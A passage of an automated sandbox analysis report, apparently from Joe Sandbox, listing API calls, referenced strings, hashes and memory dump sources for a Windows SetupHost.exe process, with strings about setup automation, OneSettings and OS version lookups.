                                                                                                                                                                                                                • WinHttpQueryHeaders.WINHTTP(?,00000036,00000000,00000000,00000004,00000000,?,?,00000000), ref: 00A09575
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00000000), ref: 00A0957F
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,00000004,?,?,00000000), ref: 00A09593
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00A0959A
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000001,00000000,00000001,00000000,00000000,?,?,00000000,00000000), ref: 00A096A8
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,?), ref: 00A096AF
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$HttpProcess$AllocErrorFreeHeadersLastQuery$ReceiveRequestResponseSend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4147306657-0
                                                                                                                                                                                                                • Opcode ID: fb598259f451ff04c8bafa068a94ad421b973c4d2cb81ae57a1580dd90b242fb
                                                                                                                                                                                                                • Instruction ID: bc4f8e81760e67d93464b35b92f4947e990c3179a0d26ede31e18afb98d1e7ef
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb598259f451ff04c8bafa068a94ad421b973c4d2cb81ae57a1580dd90b242fb
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44517F72904219FBEB21CBE5EC48BAFBB7CBB04311F108165F902E61E1D7759E059BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009ABAF4
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • MediaSetupUIMgr.dll, xrefs: 009ABC7E
                                                                                                                                                                                                                • SetupHost: Looking for automation file..., xrefs: 009ABDA2
                                                                                                                                                                                                                • SetupHost: Initializing automation..., xrefs: 009ABE4E
                                                                                                                                                                                                                • CSetupHost::InitializeComponents, xrefs: 009AC37E
                                                                                                                                                                                                                • SetupHost: OneSettings initialization failed: [0x%X], xrefs: 009ABF4A
                                                                                                                                                                                                                • SetupCore.dll, xrefs: 009ABCE4, 009ABD63
                                                                                                                                                                                                                • SetupHost: Using automation file: [%s]..., xrefs: 009ABE18
                                                                                                                                                                                                                • SetupHost: Automation information initialized., xrefs: 009ABEB4
                                                                                                                                                                                                                • SetupHost: Automation initialization failed: [0x%X], xrefs: 009ABF90
                                                                                                                                                                                                                • SetupHost: Loading AutomationManager manager..., xrefs: 009ABD36
                                                                                                                                                                                                                • SetupHost: Automation information not found. Releasing automation object., xrefs: 009ABEE7
                                                                                                                                                                                                                • SetupMgr.dll, xrefs: 009ABF6F
                                                                                                                                                                                                                • SetupHost::InitializeComponents, xrefs: 009ABB30
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3
                                                                                                                                                                                                                • String ID: CSetupHost::InitializeComponents$MediaSetupUIMgr.dll$SetupCore.dll$SetupHost: Automation information initialized.$SetupHost: Automation information not found. Releasing automation object.$SetupHost: Automation initialization failed: [0x%X]$SetupHost: Initializing automation...$SetupHost: Loading AutomationManager manager...$SetupHost: Looking for automation file...$SetupHost: OneSettings initialization failed: [0x%X]$SetupHost: Using automation file: [%s]...$SetupHost::InitializeComponents$SetupMgr.dll
                                                                                                                                                                                                                • API String ID: 431132790-311080171
                                                                                                                                                                                                                • Opcode ID: 757bf36c7813f74ce3d3366b634b3d3da2db7d255cb1d7e076b481b72b9fb47b
                                                                                                                                                                                                                • Instruction ID: 03743705da161efdd40b963817dbdf48a89649bf47c74c344c288c10b529592f
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 757bf36c7813f74ce3d3366b634b3d3da2db7d255cb1d7e076b481b72b9fb47b
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 85427FB57006118FCF059F64C894A6D7772AFC9320B198466ED16AF396DF35EC02CB91
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00A0D46A
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0D4A1
                                                                                                                                                                                                                • RtlGetVersion.NTDLL ref: 00A0D4BA
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo), ref: 00A0D519
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 00A0D520
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00A0D52C
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressErrorH_prolog3_HandleLastModuleProcVersionmemset
                                                                                                                                                                                                                • String ID: Client$GetProductInfo$InstallationType$Server$Server Core$Software\Microsoft\Windows NT\CurrentVersion$kernel32.dll
                                                                                                                                                                                                                • API String ID: 1560655752-3879065230
                                                                                                                                                                                                                • Opcode ID: 09e2fa1deabf1d02efa9028a0a5697ec1f21b06e531d990e579fbbe446116350
                                                                                                                                                                                                                • Instruction ID: 6ba440743d640ac578903a2016c932371052fc04f6ff158918e33078c170d80e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 09e2fa1deabf1d02efa9028a0a5697ec1f21b06e531d990e579fbbe446116350
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BA41B37290022D9BCF34EBE9ED556EDB6B4AF49314F1041A9E905B62C0D730AF81CF55
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000680,0000001C,009AB1D8,00000008,00000000), ref: 009B807E
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 009B8085
                                                                                                                                                                                                                  • Part of subcall function 009BA6C1: __EH_prolog3_GS.LIBCMT ref: 009BA6CB
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 009B820D
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 009B8214
                                                                                                                                                                                                                  • Part of subcall function 009B8A19: __EH_prolog3.LIBCMT ref: 009B8A20
                                                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 009B7FB8
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: GetProcessHeap.KERNEL32(00000000,?,009A7D2F), ref: 009B9B2B
                                                                                                                                                                                                                  • Part of subcall function 009B9B21: HeapFree.KERNEL32(00000000), ref: 009B9B32
                                                                                                                                                                                                                  • Part of subcall function 00A0B274: NtQueryLicenseValue.NTDLL(00A13190,00000000,00000000,00000004,00000000), ref: 00A0B320
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • OneSettings: Initialization failed -> [0x%X], xrefs: 009B8263
                                                                                                                                                                                                                • OneSettings: Initialization succeeded, found %d values., xrefs: 009B8231
                                                                                                                                                                                                                • %s=%s, xrefs: 009B81B0
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings, xrefs: 009B8013, 009B80EA, 009B819E
                                                                                                                                                                                                                • OneSettings: Blocked by policy settings., xrefs: 009B8289
                                                                                                                                                                                                                • %s;%s=%s, xrefs: 009B817F
                                                                                                                                                                                                                • OneSettings: Initialization succeeded, but no values found., xrefs: 009B8251
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$FreeH_prolog3$AllocH_prolog3_LicenseQueryValue
                                                                                                                                                                                                                • String ID: %s;%s=%s$%s=%s$CMoSetupOneSettingsHelperT<class CEmptyType>::InitializeSettings$OneSettings: Blocked by policy settings.$OneSettings: Initialization failed -> [0x%X]$OneSettings: Initialization succeeded, but no values found.$OneSettings: Initialization succeeded, found %d values.
                                                                                                                                                                                                                • API String ID: 4122440011-3034588626
                                                                                                                                                                                                                • Opcode ID: 6d9b32351e02ebaac0269b7400eeb7ca25039510e0abd0606475cb0813edd870
                                                                                                                                                                                                                • Instruction ID: 7353d43f5a7074834fcd577861c57cd5c6b73a6e435bf9515df03bf149edf56a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6d9b32351e02ebaac0269b7400eeb7ca25039510e0abd0606475cb0813edd870
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44A17370A003069BDF14EFA4CA96BFF77B9BF48364F148459E915AB285DB74D900CBA0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersion.KERNEL32 ref: 00A0294F
                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32), ref: 00A029C3
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,AddVectoredExceptionHandler), ref: 00A029D3
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A02A87
                                                                                                                                                                                                                • ExpandEnvironmentStringsW.KERNEL32(%windir%\system32\dbghelp.dll,?,00000104), ref: 00A02AA0
                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00A02AB3
                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 00A02AC8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 00A02AD6
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressLibraryProc$EnvironmentExpandFreeHandleLoadModuleStringsVersionmemset
                                                                                                                                                                                                                • String ID: %windir%\system32\dbghelp.dll$AddVectoredExceptionHandler$MiniDumpWriteDump$kernel32
                                                                                                                                                                                                                • API String ID: 997276966-3676913557
                                                                                                                                                                                                                • Opcode ID: e3daf97748f5fdd5dd79dd640a26911918bf2ff477c38f543e67bfeda816e010
                                                                                                                                                                                                                • Instruction ID: 30912cc48684829ac9a56a9aa623a414c6448b4dfdd50cb471be7a6e6da0973c
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e3daf97748f5fdd5dd79dd640a26911918bf2ff477c38f543e67bfeda816e010
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B41CEB9641318AFDB10DFA5FD4C7DA3BB9EB04748B18C618E401DA2E0DBF1954ADB90
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • TlsGetValue.KERNEL32(00A126B8,00000010,00A00CDD), ref: 00A00B5D
                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00A166F8), ref: 00A00B75
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000004), ref: 00A00B89
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A00B90
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000009), ref: 00A00BD5
                                                                                                                                                                                                                • HeapReAlloc.KERNEL32(00000000), ref: 00A00BDC
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00008010), ref: 00A00C05
                                                                                                                                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00A00C0C
                                                                                                                                                                                                                • TlsSetValue.KERNEL32(00000000), ref: 00A00C2F
                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00A166F8), ref: 00A00C92
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocCriticalSectionValue$AllocateEnterLeave
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 137540307-0
                                                                                                                                                                                                                • Opcode ID: 0c8c4ef0bab95a9f0fddb306ab95d3e426e49a2724afc72f69b8b02ff88220d4
                                                                                                                                                                                                                • Instruction ID: 450e41a88e63cbc40efd3186c3125a07a0a96d76447fc21647fe6f4ffa2594d6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0c8c4ef0bab95a9f0fddb306ab95d3e426e49a2724afc72f69b8b02ff88220d4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 20311779A043549FD720DFE5ED48BAA7BB6FB49B41B00862DE801D22A0CBB54802CF10
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00A09770
                                                                                                                                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00A097CA
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 00A097DE
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00A097E5
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00A098B7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,00000001,00000001,00000000), ref: 00A098C4
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A098CB
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AllocCloseFreeInfoOpenQuery_vsnwprintf
                                                                                                                                                                                                                • String ID: %ls\%ls\%ls$%ls\%ls\%ls\%ls$Settings
                                                                                                                                                                                                                • API String ID: 3798635121-553437501
                                                                                                                                                                                                                • Opcode ID: 08dd827bdaa76b2c52862ddf2d1afa625660780f713d8190d1aef90200414ac5
                                                                                                                                                                                                                • Instruction ID: 9bfdb2391d49dd8a879466089dc836fe532ae929b75791e5d111ada31a1585c8
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 08dd827bdaa76b2c52862ddf2d1afa625660780f713d8190d1aef90200414ac5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 925156B694022CABDB21DB54DC84FEB77BCEB48710F4441E9BA05E7281D670DE858FA4
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000057,?,00000000), ref: 009BF667
                                                                                                                                                                                                                  • Part of subcall function 009BE347: GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,009BF550,?,00000000), ref: 009BE367
                                                                                                                                                                                                                  • Part of subcall function 009BE347: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BE38E
                                                                                                                                                                                                                  • Part of subcall function 009BE347: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BE395
                                                                                                                                                                                                                  • Part of subcall function 009BE347: SetLastError.KERNEL32(00000000,?,00000000), ref: 009BE3A6
                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,00000000), ref: 009BF599
                                                                                                                                                                                                                • VerQueryValueW.VERSION(?,?,?,00000004,?,?,?,?,00000000), ref: 009BF603
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?,?,00000000), ref: 009BF632
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,?,00000000), ref: 009BF639
                                                                                                                                                                                                                  • Part of subcall function 009BE595: _vsnwprintf.MSVCRT ref: 009BE5C7
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BF641
                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00000000), ref: 009BF652
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00000000), ref: 009BF65B
                                                                                                                                                                                                                  • Part of subcall function 009BF496: GetFileVersionInfoSizeExW.VERSION(00000003,?,00000000,?,00000000,?,00000000), ref: 009BF4B0
                                                                                                                                                                                                                  • Part of subcall function 009BF496: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00000000), ref: 009BF4C1
                                                                                                                                                                                                                  • Part of subcall function 009BF496: HeapAlloc.KERNEL32(00000000,?,00000000), ref: 009BF4C8
                                                                                                                                                                                                                  • Part of subcall function 009BF496: GetFileVersionInfoExW.VERSION(00000003,?,00000000,?,00000000,?,00000000), ref: 009BF4E0
                                                                                                                                                                                                                  • Part of subcall function 009BF496: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000), ref: 009BF506
                                                                                                                                                                                                                  • Part of subcall function 009BF496: HeapFree.KERNEL32(00000000,?,00000000), ref: 009BF50D
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$ErrorLast$Process$FileFree$InfoQueryValueVersion$AllocAttributesSize_vsnwprintf
                                                                                                                                                                                                                • String ID: FileVersion$\StringFileInfo\%04X%04X\%s$\VarFileInfo\Translation
                                                                                                                                                                                                                • API String ID: 4187551046-3407502573
                                                                                                                                                                                                                • Opcode ID: 9d78881a2f40750161cce3df74a084b8710143f9c7abb59e7bda96ccbe9acc3e
                                                                                                                                                                                                                • Instruction ID: 59e818d1f6e00403f57de78c3d28bea68405121fbfd29ec6f733d71a81b7cf48
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9d78881a2f40750161cce3df74a084b8710143f9c7abb59e7bda96ccbe9acc3e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D31A871A4021DDBCF20EBA48E9DAFE777CEB54721F0005B9ED15D6150D7709E418BA1
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • OneSettings: Failed to update UBR: [0x%X], xrefs: 009BC374
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR, xrefs: 009BC2FD
                                                                                                                                                                                                                • CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer, xrefs: 009BC1D9, 009BC20C, 009BC2AE
                                                                                                                                                                                                                • %u.%u.%s, xrefs: 009BC26C
                                                                                                                                                                                                                • OneSettings: Failed to get UBR: [0x%X], xrefs: 009BC333
                                                                                                                                                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 009BC2D9
                                                                                                                                                                                                                • UBR, xrefs: 009BC2D4
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: H_prolog3_memset
                                                                                                                                                                                                                • String ID: %u.%u.%s$CMoSetupOneSettingsHelperT<class CEmptyType>::GetOsVer$CMoSetupOneSettingsHelperT<class CEmptyType>::GetUBR$OneSettings: Failed to get UBR: [0x%X]$OneSettings: Failed to update UBR: [0x%X]$SOFTWARE\Microsoft\Windows NT\CurrentVersion$UBR
                                                                                                                                                                                                                • API String ID: 2828583354-2934946344
                                                                                                                                                                                                                • Opcode ID: ad7902cce99f29553d97728014e29942b59386740fd14e3264460a0e2e954fa2
                                                                                                                                                                                                                • Instruction ID: 8f02bc73dcf6806e0f04ddbb8407d7278422c56deefbffe7da2228eae313ec52
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ad7902cce99f29553d97728014e29942b59386740fd14e3264460a0e2e954fa2
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 65611270B013289BDF25AF65CE95BED77B5AF88724F0044E9E509AB391DA709E80CF50
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 00A0AF95
                                                                                                                                                                                                                  • Part of subcall function 00A0AA94: LoadLibraryExW.KERNEL32(ntdll.dll,00000000,00000800,00000001,00A0AFA2,00000000,00000001,00000001), ref: 00A0AAA3
                                                                                                                                                                                                                  • Part of subcall function 00A0AA94: GetProcAddress.KERNEL32(00000000,RtlIsStateSeparationEnabled), ref: 00A0AAB3
                                                                                                                                                                                                                • RegOpenKeyExW.KERNEL32 ref: 00A0AFF5
                                                                                                                                                                                                                • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00A0B03D
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 00A0B06A
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000), ref: 00A0B071
                                                                                                                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 00A0B0B9
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000001,00000001), ref: 00A0B17C
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00A0B183
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00A0B198
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000005.00000002.3353990720.000000000099C000.00000020.00020000.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353969112.0000000000980000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3353977276.0000000000981000.00000020.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354034411.0000000000A13000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                • Associated: 00000005.00000002.3354043168.0000000000A17000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_980000_SetupHost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$AddressAllocCloseEnumFreeInfoLibraryLoadOpenProcQuerymemset
                                                                                                                                                                                                                • String ID: \Users
                                                                                                                                                                                                                • API String ID: 3246958429-3656258783
                                                                                                                                                                                                                • Opcode ID: 5fcdd478d1893b2254f0190398aa7a39c35df6206b475be249fe7c05f1033570
                                                                                                                                                                                                                • Instruction ID: 6acfce26b8b96777637cbb5b0f2ba150634ac223e31828049b208c2fad4e0777
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fcdd478d1893b2254f0190398aa7a39c35df6206b475be249fe7c05f1033570
                                                                                                                                                                                                                • Instruction Fuzzy Hash: FE51D676D5123D9BCB21DB54DD89BDEB7B4AB18700F1042D5E908A7281D7309E81CFB0
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000), ref: 009A3522
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32(00000000,?), ref: 009A35A1
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
